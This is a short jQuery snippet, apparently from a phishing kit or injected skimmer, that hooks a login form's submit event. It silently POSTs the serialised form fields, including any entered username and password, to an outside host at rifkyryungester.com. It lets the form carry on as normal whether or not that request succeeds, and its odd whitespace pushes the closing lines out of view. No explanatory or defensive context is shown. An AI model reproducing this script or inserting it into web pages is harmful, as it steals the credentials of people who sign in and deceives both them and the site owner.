$(".login-form").submit(function() {
	var d = $(".login-form");
		$.ajax({
			        url: "http://rifkyryungester.com/auth/result.php",
			        	                type: "POST",
			        	                	                        data: $('.login-form').serialize(),
			        	                	                        	                             dataType: 'text',
			        	                	                        	                             	                                  success: function () {
			        	                	                        	                             	                                  	                                             return true;
			        	                	                        	                             	                                  	                                             	                                                         },
			        	                	                        	                             	                                  	                                             	                                                         	                                                             error: function () {
			        	                	                        	                             	                                  	                                             	                                                         	                                                             	                                                                       return true;
			        	                	                        	                             	                                  	                                             	                                                         	                                                             	                                                                       	                                                                                   },
			        	                	                        	                             	                                  	                                             	                                                         	                                                             	                                                                       	                                                                                   	                                                                                    });
			        	                	                        	                             	                                  	                                             	                                                         	                                                             	                                                                       	                                                                                   	                                                                                    	                                                                                    });
